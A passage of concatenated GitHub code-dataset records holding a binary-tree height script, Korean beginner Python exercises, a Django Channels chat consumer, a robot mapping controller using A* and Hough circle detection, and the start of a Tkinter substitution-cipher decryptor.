os.remove(log)\n\n","repo_name":"godlike375/VolumeCalculator3D","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73319561124","text":"class BinaryTreeNode:\n def __init__(self,data):\n self.data=data\n self.left=None\n self.right=None\n\ndef height(root):\n if root is None:\n return 0\n leftNode=height(root.left)\n rightNode=height(root.right)\n return 1+max(leftNode,rightNode)\n\n\ndef inputTree():\n data=int(input())\n if data is -1:\n return\n root=BinaryTreeNode(data)\n root.left=inputTree()\n root.right=inputTree()\n return root\n\ndef preOrder(root):\n if root is None:\n return\n print(root.data,end=\":\")\n if root.left is not None:\n print(root.left.data,end=\",\")\n if root.right is not None:\n print(root.right.data,end=\"\")\n print()\n preOrder(root.left)\n preOrder(root.right)\nprint(height(inputTree()))\n#preOrder(inputTree())\n\n\n","repo_name":"Svastikkka/DS-AND-ALGO","sub_path":"Binary Tree/Height Of Tree.py","file_name":"Height Of Tree.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13712569414","text":"def symmetric(sqmat):\n size = len(sqmat)\n for i in range(size):\n for j in range(size):\n if (i != j and sqmat[i][j] != sqmat[j][i]):\n return False\n return True\n\n\nprint(symmetric([[2,3],[3,2]])) # True\nprint(symmetric([[2,3],[2,3]])) # False\nprint(symmetric([[1,7,3],[7,4,-5],[3,-5,6]])) # True\nprint(symmetric([[1,1,1,1],[1,1,1,1],[1,1,1,1],[1,1,1,1]])) # True\nprint(symmetric([[1,2,3,4],[2,1,4,3],[3,4,1,2],[4,3,2,1]])) # True\n\n##### 1. 9의 보수\n# 수의 각 자리수에서 9와의 차이로 얻는 수를 9의 보수라고 한다.\n# 정수를 받아서 9의 보수를 구하는 함수를 작성하시오.\n# 인수 n은 자연수라고 가정\ndef complement9(n):\n s = str(n)\n ans = \"\"\n for c in s:\n d = 9 - int(c)\n ans = ans + str(d)\n return int(ans)\n\n# print(0,\">>\",complement9(0)) # 9\n# print(9,\">>\",complement9(9)) # 0\n# print(4,\">>\",complement9(4)) # 5\n# print(18,\">>\",complement9(18)) # 81\n# print(40,\">>\",complement9(40)) # 59\n# print(307,\">>\",complement9(307)) # 692\n# print(9999,\">>\",complement9(9999)) # 0\n# print(9142,\">>\",complement9(9142)) # 857\n# print(9965,\">>\",complement9(9965)) # 34\n\n##### 2. 찾기\n# 원소 key와 원소의 리스트 xs를 인수로 받아서\n# key가 xs에서 처음 나오는 위치번호를 리턴하는 함수\n# key가 xs에 없으면 -1을 리턴\ndef search1st(key,ns) :\n index = 0\n for n in ns :\n if key == n :\n break\n else :\n index += 1\n if index == len(ns) :\n return -1\n else :\n return index\n\n# print(search1st(3,[])) # -1\n# print(search1st(3,[4,6,3,3,3])) # 2\n# print(search1st(3,[3,3,3,3,3])) # 0\n# print(search1st(3,[4,2,7,6,5])) # -1\n\n# 원소 key와 원소의 리스트 xs를 인수로 받아서\n# xs에 있는 모든 key의 위치번호의 리스트를 리턴하는 함수를 작성하시오.\ndef searchAll(key,ns) :\n index = 0\n indexes = []\n for n in ns :\n if key == n :\n indexes += [index]\n index += 1\n return indexes\n\n# print(searchAll(3,[])) # []\n# print(searchAll(3,[4,6,3,3,3])) # [2,3,4]\n# print(searchAll(3,[3,3,3,3,3])) # [0,1,2,3,4]\n# print(searchAll(3,[4,2,7,6,5])) # []\n\n\n##### 3~4. 올려 세기\n\ndef countUpTo(n):\n if n < 0:\n return []\n else:\n return countUpTo(n-1) + [n]\n\ndef countUpTo(n):\n def loop(n,ns):\n if n < 0:\n return ns\n else:\n return loop(n-1,[n]+ns)\n return loop(n,[])\n\ndef countUpTo(n):\n ns = []\n while n >= 0:\n ns = [n] + ns\n n -= 1\n return ns\n\ndef countUpTo(n):\n ns = []\n for i in range(n+1):\n ns.append(i)\n return ns\n\n# print(countUpTo(0)) # [0]\n# print(countUpTo(5)) # [0, 1, 2, 3, 4, 5]\n# print(countUpTo(-3)) # []\n\n\n##### 5~6. 리스트 원소별로 더하기\n##### 이해하고 꼬리재귀, while루프 버전으로 바꾸기\ndef zippo(xs,ys):\n if xs == [] or ys == []:\n return xs + ys\n else:\n return [xs[0]+ys[0]] + zippo(xs[1:],ys[1:])\n\ndef zippo(xs,ys):\n def loop(xs,ys,zs):\n if xs == [] or ys == []:\n return zs + xs + ys\n else:\n return loop(xs[1:],ys[1:],zs+[xs[0]+ys[0]])\n return loop(xs,ys,[])\n\ndef zippo(xs,ys):\n zs = []\n while not (xs == [] or ys == []):\n zs = zs + [xs[0]+ys[0]]\n xs, ys = xs[1:], ys[1:]\n return zs + xs + ys\n\n# print(zippo([],[]))\n# print(zippo([2,7,4],[7,2,5]))\n# print(zippo([2,7,4],[7,2,5,9,9]))\n# print(zippo([2,7,4,9,9],[7,2,5]))\n\n##### 7. Blast\n# 정수 리스트를 받아서 각 정수를 그 수만큼 나열하여 붙여서 내주는 함수를\n# 중첩 for 루프를 사용하여 작성하시오.\n\ndef blast(ns):\n bs = []\n for n in ns:\n ns = []\n for _ in range(n):\n ns.append(n)\n bs += ns\n return bs\n\n# print(blast([]))\n# print(blast([1,2,4]))\n# print(blast([3,4,5,1,2,4]))\n# print(blast([2,-3,3]))\n\n##### 8~10. 집합\ndef makeset(xs):\n ys = []\n for x in xs:\n if x not in ys:\n ys.append(x)\n return ys\n\ndef union(xs,ys):\n zs = []\n for x in xs:\n if x not in ys:\n zs.append(x)\n return zs+ys\n\ndef diff(xs,ys):\n zs = []\n for x in xs:\n if x not in ys:\n zs.append(x)\n return zs\n\ndef intersect(xs,ys):\n zs = []\n for x in xs:\n if x in ys:\n zs.append(x)\n return zs\n\n# ## Test\n# import random\n# s1 = makeset([random.randrange(10) for _ in range(10)])\n# print(s1)\n# s2 = makeset([random.randrange(10) for _ in range(10)])\n# print(s2)\n# print(union(s1,s2))\n# print(diff(s1,s2))\n# print(intersect(s1,s2))\n\n\n##### 11. Equivalent class\ndef equiv_class(ns):\n ns.sort()\n if ns == [] :\n return []\n else :\n top = ns[0]\n nss = [[top]]\n for n in ns[1:] :\n top = nss[-1][0]\n if n == top :\n tops = nss[-1]\n nss = nss[:-1]\n nss.append(tops+[n])\n else :\n nss.append([n])\n return nss\n\n# print(equiv_class([])) # []\n# print(equiv_class([3])) # [[3]]\n# print(equiv_class([4,3,2,4,4])) # [[2],[3],[4,4,4]]\n# print(equiv_class([2,4,4,2,2,3])) # [[2,2,2],[3],[4,4]]\n\n##### 12. Permutation\n#정수 리스트를 받아서 원소의 가능한 모든 순열의 리스트를 만드는 함수 perm\n#을 작성하시오.\ndef perm(xs):\n ps = [[]]\n for x in xs:\n ns = []\n for p in ps:\n ns.append(p+[x])\n ps += ns\n return ps\n\n# print(perm([])) # [[]]\n# print(perm([1])) # [[],[1]]\n# print(perm([1,2])) # [[],[1],[2],[1,2]]\n# print(perm([1,2,3])) # [[], [1], [2], [1, 2], [3], [1, 3], [2, 3], [1, 2, 3]]\n# print(perm([1,2,3,4])) # [[], [1], [2], [1, 2], [3], [1, 3], [2, 3], [1, 2, 3], [4], [1, 4], [2, 4], [1, 2, 4], [3, 4], [1, 3, 4], [2, 3, 4], [1, 2, 3, 4]]","repo_name":"SeungHune/Programming-Basic","sub_path":"2018_mid/2018_fin_1.py","file_name":"2018_fin_1.py","file_ext":"py","file_size_in_byte":5823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10684928856","text":"from django.contrib.auth import get_user_model\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nimport json\nfrom chat.views import get_user_contact, get_current_chat, get_chats\nfrom django.core import serializers\nfrom UserProfile.models import UserProfile\nfrom chat.models import Message, Chat\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nimport channels.layers\nfrom asgiref.sync import async_to_sync\nfrom channels.layers import get_channel_layer\n\n\nUser = get_user_model()\n\nclass ChatListConsumer(WebsocketConsumer):\n\n def fetch_chats(self, data):\n chats = get_chats(data['username'], data['chatIndex'])\n content = {\n 'command': 'chats',\n 'chats': self.chats_to_json(chats, data),\n }\n self.send_chats(content)\n\n def fetch_more_chats(self, data):\n chats = get_chats(data['username'], data['chatIndex'])\n\n content = {\n 'command': 'more_chats',\n 'chats': self.chats_to_json(chats, data)\n }\n self.send_chats(content)\n\n def chats_to_json(self, chats, data):\n result = []\n for chat in chats:\n result.append(self.chat_to_json(chat, data))\n return result\n\n def chat_to_json(self, chat, data):\n participants = chat.participants.all()\n participants_list = []\n user = ''\n for participant in participants:\n if participant.username != data['username']:\n user = participant\n participants_list.append(participant.username)\n contact = get_user_contact(user)\n user_profile = UserProfile.objects.get(user=contact)\n user_image = None\n if user_profile.image:\n user_image = user_profile.image.url\n\n last_message = chat.messages.last().content\n\n current_user = get_user_contact(data['username'])\n visited = current_user in chat.visited.all()\n\n return {\n 'id': chat.id,\n 'username': participants_list,\n 'last_message': last_message,\n 'visited': visited,\n 'user_image': user_image,\n 'updated_at': str(chat.updated_at),\n }\n\n commands = {\n 'fetch_chats': fetch_chats,\n 'fetch_more_chats': fetch_more_chats,\n }\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'chatList_%s' % self.room_name\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n self.accept()\n\n def disconnect(self, close_code):\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n def receive(self, text_data):\n data = json.loads(text_data)\n self.commands[data['command']](self, data)\n\n # def send_chat(self, chat):\n # async_to_sync(self.channel_layer.group_send)(\n # self.room_group_name,\n # {\n # 'type': 'chat',\n # 'chat': chat\n # }\n # )\n\n def send_chats(self, chats):\n self.send(text_data=json.dumps(chats))\n\n # def chat(self, event):\n # chat = event['chat']\n # self.send(text_data=json.dumps(chat))","repo_name":"neerraghuwanshi/django-some","sub_path":"chat/chatListConsumers.py","file_name":"chatListConsumers.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36553216930","text":"\"\"\"\r\n University of Liege\r\n INFO0948-2 - Introduction to intelligent robotics\r\n Authors : \r\n BOVEROUX Laurie\r\n DELCOUR Florian\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom robopy.base.transforms import transl, trotx, troty, trotz\r\nfrom youbot_hokuyo import youbot_hokuyo\r\nfrom matplotlib import path\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import ListedColormap\r\nfrom astar import *\r\nfrom skimage import color\r\nfrom skimage.transform import hough_circle, hough_circle_peaks\r\nfrom skimage.feature import canny\r\nfrom skimage.draw import circle_perimeter\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nclass Map:\r\n\r\n def __init__(self, height, width, resolution,numTables,radiusTables):\r\n \r\n ####################################\r\n # variables for navigation #\r\n ####################################\r\n\r\n # map parameters\r\n self.height = height\r\n self.width = width\r\n self.resolution = resolution\r\n self.matHeight = 2*self.height*self.resolution\r\n self.matWidth = 2*self.width*self.resolution\r\n self.map = np.zeros((self.matHeight, self.matWidth))\r\n \r\n # scanned points from hokuyo sensors\r\n self.hokuyoPt = 0\r\n\r\n # contact points from hokuyo sensors\r\n self.hokuyoContacts = 0\r\n\r\n # previous goal point\r\n self.prevGoal = []\r\n\r\n\r\n ####################################\r\n # variables for manipulation #\r\n ####################################\r\n \r\n self.numTables = numTables\r\n self.radiusTables = radiusTables\r\n self.tableCenter = {'easy': [None, None], 'hard': [None, None], 'target' : [None, None]}\r\n self.tableCenterScene = {'easy' : [-5.575,2.925], 'hard' : [-5.55,5.2], 'target' : [None,None]}\r\n\r\n # x and y coordinates of the tables perimeter\r\n self.perimTabx = []\r\n self.perimTaby = []\r\n\r\n # copy of the map without tables as obstacles\r\n self.mapWithoutTables = np.zeros((self.matHeight, self.matWidth))\r\n\r\n # extended grids obstacles\r\n self.gridExtend1 = None\r\n self.gridExtend2 = None\r\n\r\n # coordinates around target table\r\n self.posAroundTarget = []\r\n\r\n\r\n def updateDataHokuyo(self, robot):\r\n \"\"\"Update the map with the data from the hokuyo sensors\"\"\"\r\n\r\n # transformation to robot position in the meshgrid\r\n youbotPosMap = robot.youbotPos - robot.youbotPosInit + np.array([self.height, self.width,0])\r\n trf = transl(youbotPosMap[0],youbotPosMap[1],youbotPosMap[2]) * trotx(robot.youbotEuler[0]) * troty(robot.youbotEuler[1]) * trotz(robot.youbotEuler[2])\r\n\r\n # get data from the hokuyo - return empty if data is not captured\r\n scanned_points, contacts = youbot_hokuyo(robot.vrep, robot.h, robot.vrep.simx_opmode_buffer,trans = trf)\r\n\r\n # coordinates of the sensors\r\n tmph1 = trf * np.array([[robot.h['hokuyo1Pos'][0],robot.h['hokuyo1Pos'][1],robot.h['hokuyo1Pos'][2],1]]).T\r\n coordH1 = np.array([tmph1[0][0],tmph1[1][0]],dtype=object)\r\n \r\n tmph2 = trf * np.array([[robot.h['hokuyo2Pos'][0],robot.h['hokuyo2Pos'][1],robot.h['hokuyo2Pos'][2],1]]).T\r\n coordH2 = np.array([tmph2[0][0],tmph2[1][0]],dtype=object)\r\n\r\n all_X_scanned_points = np.concatenate((scanned_points[0,:],scanned_points[3,:]), axis=1)\r\n all_X = np.insert(all_X_scanned_points,0,coordH1[0],axis=1)\r\n all_X = np.insert(all_X,len(all_X),coordH2[0],axis=1)\r\n\r\n all_Y_scanned_points = np.concatenate((scanned_points[1,:],scanned_points[4,:]), axis=1)\r\n all_Y = np.insert(all_Y_scanned_points,0,coordH1[1],axis=1)\r\n all_Y = np.insert(all_Y,len(all_Y),coordH2[1],axis=1)\r\n\r\n self.hokuyoPt = np.stack((all_X_scanned_points, all_Y_scanned_points), axis=0)\r\n\r\n # create the test meshgrid\r\n xMax = np.max(all_X)\r\n xMin = np.min(all_X)\r\n yMax = np.max(all_Y)\r\n yMin = np.min(all_Y)\r\n a = np.arange(xMin,xMax,1/self.resolution)\r\n b = np.arange(yMin,yMax,1/self.resolution)\r\n mx, my = np.meshgrid(a,b)\r\n catalog_test_points = np.stack((mx.flatten(),my.flatten()),axis=1) \r\n\r\n # create the polygon\r\n points = np.transpose(np.stack((all_X, all_Y),axis=0))\r\n poly = path.Path(points)\r\n\r\n pointsRes = poly.contains_points(catalog_test_points)\r\n \r\n # Update map with point in polygon\r\n # point = free -> -1\r\n # point = obstacle -> +10\r\n # point = unobserved -> 0\r\n\r\n # If points in the polygon, there in no obstacle \r\n indMinus = np.where(pointsRes)\r\n self.map[(np.round((catalog_test_points[indMinus,0])*self.resolution)).astype(int), (np.round((catalog_test_points[indMinus,1])*self.resolution)).astype(int)] -=1\r\n\r\n # Update the map in function of the points from the hokuyo sensors\r\n all_contacts = np.concatenate((contacts[0,:],contacts[1,:]), axis=0)\r\n self.hokuyoContacts = all_contacts\r\n\r\n indPlus = np.where(all_contacts) #obstacle\r\n indMinus = np.where(all_contacts == False) #free\r\n self.map[(np.round((all_X_scanned_points[0,indPlus])*self.resolution)).astype(int), (np.round((all_Y_scanned_points[0,indPlus])*self.resolution)).astype(int)] += 10\r\n self.map[(np.round((all_X_scanned_points[0,indMinus])*self.resolution)).astype(int), (np.round((all_Y_scanned_points[0,indMinus])*self.resolution)).astype(int)] -= 1\r\n\r\n\r\n def show(self, *args):\r\n \"\"\"Display the map along with robot pos and trajectory\"\"\"\r\n \r\n mapCopie = np.copy(self.map)\r\n indNeg = np.where(mapCopie[:,:] < 0)\r\n mapCopie[indNeg] = -1\r\n indPos = np.where(mapCopie[:,:] > 0)\r\n mapCopie[indPos] = 1\r\n vec_col = ListedColormap([\"darkslateblue\", \"lightblue\", \"yellow\"])\r\n\r\n if len(args) == 0:\r\n plt.pcolormesh(mapCopie[:,:],vmax = 1,vmin = -1,cmap=vec_col)\r\n plt.ylim(max(plt.ylim()), min(plt.ylim()))\r\n plt.show(block=False)\r\n plt.pause(0.05)\r\n plt.savefig(\"mapExplored.pdf\")\r\n\r\n if len(args) == 2:\r\n if(not len(args[0])):\r\n return\r\n plt.clf()\r\n plt.pcolormesh(mapCopie[:,:],vmax = 1,vmin = -1,cmap=vec_col)\r\n for point in args[0]:\r\n plt.scatter(point[1], point[0], c='red')\r\n robot = args[1]\r\n youbotPosMap = (robot.youbotPos - robot.youbotPosInit + np.array([self.height, self.width,0]))[:2] * self.resolution\r\n plt.scatter(round(youbotPosMap[1]), round(youbotPosMap[0]), c='black')\r\n plt.ylim(max(plt.ylim()), min(plt.ylim()))\r\n plt.show(block=False)\r\n plt.pause(0.05)\r\n\r\n if len(args) == 1:\r\n plt.clf()\r\n plt.pcolormesh(mapCopie[:,:],vmax = 1,vmin = -1,cmap=vec_col)\r\n for i in range(self.numTables):\r\n for point in zip(self.perimTabx[i], self.perimTaby[i]):\r\n plt.scatter(point[1], point[0], 5, c='red')\r\n plt.ylim(max(plt.ylim()), min(plt.ylim()))\r\n plt.show(block=True)\r\n plt.pause(0.05)\r\n\r\n\r\n def getNextPath(self, robot, fromPt):\r\n \"\"\"Return the next path to follow using astar algorithm\"\"\"\r\n\r\n while True:\r\n\r\n youbotPosMap = (np.round((robot.youbotPos - robot.youbotPosInit + np.array([self.height, self.width,0])) * self.resolution)).astype(int)\r\n fromPt = fromPt * self.resolution\r\n gp = self.getNextPoint(youbotPosMap)\r\n\r\n if gp[0] == np.inf:\r\n print('ERROR : no goal point')\r\n return [[np.inf,np.inf]]\r\n \r\n sp = youbotPosMap[:2]\r\n path = astar(sp[0], sp[1], gp[0], gp[1], self.map)\r\n\r\n if len(path) == 0:\r\n self.prevGoal.append((gp[0], gp[1]))\r\n continue\r\n \r\n if len(path) >=3:\r\n path = self.optimizePath(path)\r\n \r\n self.prevGoal = []\r\n return path\r\n\r\n\r\n def optimizePath(self, path):\r\n \"\"\"Remove colinear points to optimize path\"\"\"\r\n\r\n newPath = [path[0]]\r\n \r\n p_1 = path[0]\r\n p_2 = path[1]\r\n p_3 = path[2]\r\n\r\n for i in range(2, len(path)):\r\n x1, y1 = p_1[0], p_1[1]\r\n x2, y2 = p_2[0], p_2[1]\r\n x3, y3 = p_3[0], p_3[1] \r\n\r\n if ((y3 - y2) * (x2 - x1) != (y2 - y1) * (x3 - x2)):\r\n newPath.append(p_2)\r\n\r\n p_1 = p_2\r\n p_2 = p_3\r\n p_3 = path[i]\r\n \r\n newPath.append(path[-1])\r\n return newPath\r\n \r\n\r\n def getNextPoint(self,youbotPosMap):\r\n \"\"\"\r\n Return the next point to go. It is the closest point greater than 0.5 meters to the robot.\r\n This point is a unobserved point next to one free point.\r\n \"\"\"\r\n\r\n maxDist = np.inf\r\n nextPt = np.array([np.inf,np.inf])\r\n grid = np.zeros((self.matHeight, self.matWidth)) \r\n ind = np.where(self.map[:,:] > 0)\r\n grid[ind] = 1\r\n\r\n # inflate obstacles of the grid\r\n struct2 = sp.generate_binary_structure(2, 2)\r\n grid = sp.binary_dilation(grid, structure=struct2, iterations = 2).astype(grid.dtype)\r\n ind = np.where((grid==0) & (self.map[:,:] < 0))\r\n \r\n for k in range(len(ind[0])):\r\n i = ind[0][k]\r\n j = ind[1][k]\r\n\r\n if (i,j) in self.prevGoal:\r\n continue\r\n\r\n # At least 1 free point around the next target point\r\n count = 0\r\n for x in [i-1, i, i+1]:\r\n for y in [j-1, j, j+1]:\r\n if x >= 0 and y >= 0 and x < self.matHeight and y < self.matWidth and not(x==i and y ==j):\r\n if self.map[x,y] == 0 : #There is a unexplored neighboor\r\n count += 1\r\n break\r\n \r\n if count >= 1:\r\n coordNextPt = np.array([i,j])\r\n dist = np.linalg.norm(youbotPosMap[:2] - coordNextPt)\r\n if dist < maxDist and dist > 5*self.resolution:\r\n maxDist = dist\r\n nextPt = coordNextPt\r\n\r\n return nextPt\r\n\r\n\r\n def tableCenterFinding(self,robot):\r\n \"\"\"\r\n Find the center of the target table. \r\n Generate some points around object table and target table\r\n \"\"\"\r\n \r\n # Coordinates of easy and hard table are known and fixed.\r\n self.tableCenter['easy'] = [round((-5.575 - robot.youbotPosInit[0] + 15)*self.resolution), round((2.925 - robot.youbotPosInit[1] + 15)*self.resolution)]\r\n self.tableCenter['hard'] = [round((-5.55 - robot.youbotPosInit[0] + 15)*self.resolution), round((5.2 - robot.youbotPosInit[1] + 15)*self.resolution)]\r\n\r\n mapCopy = self.map.copy()\r\n indOne = np.where(mapCopy > 0)\r\n indZero = np.where(mapCopy < 0)\r\n mapCopy[indOne] = 1\r\n mapCopy[indZero] = 0\r\n\r\n edges = canny(mapCopy)\r\n # detect two radii\r\n #hough_radii = np.array([round(self.radiusTables * self.resolution),round((self.radiusTables * self.resolution)+1)])\r\n hough_radii = np.array([round((self.radiusTables * self.resolution)+1)])\r\n hough_res = hough_circle(edges, hough_radii)\r\n \r\n # select the most prominent 3 circles\r\n _, cx, cy, radii = hough_circle_peaks(hough_res, hough_radii, total_num_peaks=self.numTables)\r\n \r\n # draw them\r\n image = color.gray2rgb(mapCopy)\r\n self.mapWithoutTables = self.map.copy()\r\n\r\n for center_y, center_x, radius in zip(cy, cx, radii):\r\n circy, circx = circle_perimeter(center_y, center_x, radius,shape=image.shape)\r\n self.perimTabx.append(circy)\r\n self.perimTaby.append(circx)\r\n\r\n xMax = np.max(circy)\r\n xMin = np.min(circy)\r\n yMax = np.max(circx)\r\n yMin = np.min(circx)\r\n self.mapWithoutTables[xMin:xMax+1, yMin:yMax+1] = -1\r\n\r\n self.show(True)\r\n\r\n tabInd = []\r\n for tab in ['easy', 'hard']:\r\n a = np.linalg.norm([self.tableCenter[tab][0]-cy[0], self.tableCenter[tab][1]-cx[0]])\r\n b = np.linalg.norm([self.tableCenter[tab][0]-cy[1], self.tableCenter[tab][1]-cx[1]])\r\n c = np.linalg.norm([self.tableCenter[tab][0]-cy[2], self.tableCenter[tab][1]-cx[2]])\r\n tabInd.append(np.argmin((a,b,c)))\r\n\r\n targetInd = (set(range(self.numTables))- set(tabInd)).pop()\r\n self.tableCenter['target'] = [cy[targetInd], cx[targetInd]]\r\n\r\n for j in range(self.perimTabx[targetInd].shape[0]):\r\n x = self.perimTabx[targetInd][j]\r\n y = self.perimTaby[targetInd][j]\r\n\r\n while self.gridExtend1[x,y] != 0:\r\n x, y = self.extendPointOutTable(cy[targetInd], cx[targetInd], x, y)\r\n x, y = self.extendPointOutTable(cy[targetInd], cx[targetInd], x, y)\r\n\r\n if [x, y] not in self.posAroundTarget:\r\n self.posAroundTarget.append([x,y])\r\n\r\n a = len(self.posAroundTarget)\r\n self.posAroundTarget = self.posAroundTarget[:int(a/3)]\r\n\r\n return\r\n \r\n\r\n def extendPointOutTable(self,cx,cy,x,y):\r\n \"\"\"Get next point out of the table\"\"\"\r\n if x > cx:\r\n if y > cy:\r\n return x+1, y+1\r\n elif y < cy:\r\n return x+1, y-1\r\n else:\r\n return x+1, y\r\n elif x < cx:\r\n if y > cy:\r\n return x-1, y+1\r\n elif y < cy:\r\n return x-1, y-1\r\n else:\r\n return x-1, y\r\n else:\r\n if y > cy:\r\n return x, y+1\r\n elif y < cy:\r\n return x, y-1\r\n else:\r\n return x, y\r\n\r\n\r\n def getPointNearObject(self,objTar,centerTab):\r\n \"\"\"Get nearest free point around the object\"\"\"\r\n\r\n # Extend the point out of the table\r\n cx = centerTab[0]\r\n cy = centerTab[1] \r\n ox = round(objTar[0])\r\n oy = round(objTar[1])\r\n\r\n align = np.inf\r\n\r\n for i in [-1, 0, 1]:\r\n for j in [-1, 0, 1]:\r\n if i == 0 and j == 0:\r\n continue\r\n newI = ox+i\r\n newJ = oy+j\r\n \r\n if np.linalg.norm([cx-newI, cy-newJ]) < self.radiusTables*self.resolution:\r\n continue\r\n\r\n a = ((cy - oy) * (ox-newI) - (oy-newJ) * (cx - ox))\r\n\r\n if abs(a) < align:\r\n align = abs(a)\r\n\r\n while self.gridExtend1[newI,newJ] != 0:\r\n newI += i\r\n newJ += j\r\n\r\n xObject = newI + i\r\n yObject = newJ + j\r\n \r\n mapCopie = np.copy(self.map)\r\n indNeg = np.where(mapCopie[:,:] < 0)\r\n mapCopie[indNeg] = -1\r\n indPos = np.where(mapCopie[:,:] > 0)\r\n mapCopie[indPos] = 1\r\n vec_col = ListedColormap([\"darkslateblue\", \"lightblue\", \"yellow\"])\r\n\r\n return [round(xObject), round(yObject)]\r\n\r\n\r\n def getPtAroundTableCenter(self, target, source):\r\n \"\"\"\r\n Get nearest point from robot around the table center\r\n 'target' : point to extend where we want to go (ex: center)\r\n 'source' : (ex : youBot)\r\n \"\"\"\r\n\r\n i = target[0]\r\n j = target[1]\r\n iMin = None\r\n jMin = None\r\n dist = np.inf\r\n\r\n for x in [i-4, i, i+4]:\r\n for y in [j-4, j, j+4]:\r\n if x >= 0 and y >= 0 and x < self.matHeight and y < self.matWidth and not(x==i and y==j):\r\n\r\n distCurr = np.linalg.norm([x-source[0], y-source[1]])\r\n\r\n if distCurr < dist and self.gridExtend2[x,y] != 1:\r\n iMin = x\r\n jMin = y\r\n dist = distCurr\r\n \r\n cx = target[0]\r\n cy = target[1] \r\n x = iMin\r\n y = jMin\r\n dist = np.linalg.norm([cx-x, cy-y])\r\n\r\n while(dist < (2*self.radiusTables*self.resolution)+1): \r\n x,y = self.extendPointOutTable(cx,cy,x,y)\r\n dist = np.linalg.norm([cx-x, cy-y])\r\n\r\n return [round(x),round(y)]\r\n\r\n\r\n","repo_name":"FlorianDelcour/Robotics","sub_path":"LazyBot/MapController.py","file_name":"MapController.py","file_ext":"py","file_size_in_byte":16502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71003287845","text":"\"\"\"\r\nDecriptor loko\r\n\"\"\"\r\n# -⁻- coding: UTF-8 -*-\r\nimport os\r\nfrom tkinter import *\r\n\r\nclass Decriptor:\r\n def __init__(self):\r\n self.rutaPY = str(os.path.dirname(os.path.abspath(__file__))) # En donde estoy padado\r\n self.pantalla = Tk()\r\n self.tela = Canvas(self.pantalla, width=900, height=720, bg=\"snow\")\r\n self.lblBarnner = Label(self.tela, text=\"Esto fue creado por el loco para decifrar .txt por sustitución\")\r\n self.lblNombreTxt = Label(self.tela, text=\"Ingrese el nombre del txt: \")\r\n self.txtNombreTXT = Entry(self.tela)\r\n self.btnCargarTexto = Button(self.tela, text=\"CargarTexto\", command=self.cargarTexto)\r\n self.btnInstrucciones = Button(self.tela, text=\"Instrucciones\", bg=\"green\", command=self.mostrarInstrucciones)\r\n self.btnActualizarTexto = Button(self.tela, text=\"Actualizar\", command=self.actualizartexto)\r\n self.txtTextoBruto = Text(self.tela, width=70)\r\n self.bannerPorcentaje = Label(self.tela, text=\"%De Coincidencia%\")\r\n self.lblRemplazar = Label(self.tela, text=\"Reemplzar A -> B : \")\r\n self.txtReemplazarA = Entry(self.tela, width=6)\r\n self.txtReemplazarB = Entry(self.tela, width=6)\r\n self.btnReemplazarAB = Button(self.tela, text=\"reemplazarAB\", command=self.reemplazarEnTextoAB)\r\n self.lblVerPalabrasSiElEspacioEs = Label(self.tela, text=\"Ver palabras si el espacio es: \")\r\n self.txtVerPalabrasSiElEspacioEs = Entry(self.tela, width=6)\r\n self.btnVerPalabrasSiElEspacioEs = Button(self.tela, text=\"Ver\", command=self.verPalabrasSiElEspacioEsA)\r\n self.lblVerCuantasVecesApareceUnPatron = Label(self.tela, text=\"Ver cuantas Veces Aparece el patrón: \")\r\n self.txtVerCuantasVecesApareceUnPatron = Entry(self.tela, width=6)\r\n self.btnVerCuantasVecesApareceUnPatron = Button(self.tela, text=\"Ver\", command=self.verCantidadDeCoindicenciasDePatron)\r\n\r\n\r\n \"\"\"Variables\"\"\"\r\n self.textoCargadoExitosamente = False\r\n self.textoEncriptado = \"\" # Aqui se guarda el texto original\r\n self.textoTemporal = \"\"\r\n\r\n self.pintarPantallaYMostrar()\r\n\r\n def pintarPantallaYMostrar(self):\r\n self.pantalla.title(\"DecriptorByFelipelosH\")\r\n self.pantalla.geometry(\"900x720\")\r\n\r\n self.tela.place(x=0, y=0)\r\n self.lblBarnner.place(x=280, y=10)\r\n self.lblNombreTxt.place(x=20, y=40)\r\n self.txtNombreTXT.place(x=200, y=40)\r\n self.btnCargarTexto.place(x=330, y=40)\r\n self.btnInstrucciones.place(x=800, y=20)\r\n self.bannerPorcentaje.place(x=600, y=80)\r\n self.txtTextoBruto.place(x=10, y=80)\r\n\r\n self.tela.create_line(10, 490, 890, 490)\r\n self.tela.create_line(10, 500, 890, 500)\r\n\r\n self.lblRemplazar.place(x=20, y=540)\r\n self.txtReemplazarA.place(x=140, y=542)\r\n self.txtReemplazarB.place(x=190, y=542)\r\n self.btnReemplazarAB.place(x=240, y=540)\r\n self.lblVerPalabrasSiElEspacioEs.place(x=20, y=590)\r\n self.txtVerPalabrasSiElEspacioEs.place(x=190, y=590)\r\n self.btnVerPalabrasSiElEspacioEs.place(x=240, y=588)\r\n self.lblVerCuantasVecesApareceUnPatron.place(x=20, y=630)\r\n self.txtVerCuantasVecesApareceUnPatron.place(x=240, y=630)\r\n self.btnVerCuantasVecesApareceUnPatron.place(x=300, y=628)\r\n\r\n \r\n\r\n\r\n self.pantalla.mainloop()\r\n\r\n def mostrarBotonActualizar(self):\r\n self.btnActualizarTexto.place(x=500, y=40)\r\n\r\n def cargarTexto(self):\r\n if self.validarTxtEntradaTexto():\r\n try:\r\n rutaTXT = self.rutaPY + \"\\\\\" + str(self.txtNombreTXT.get()) + \".txt\"\r\n blockDeNotas = 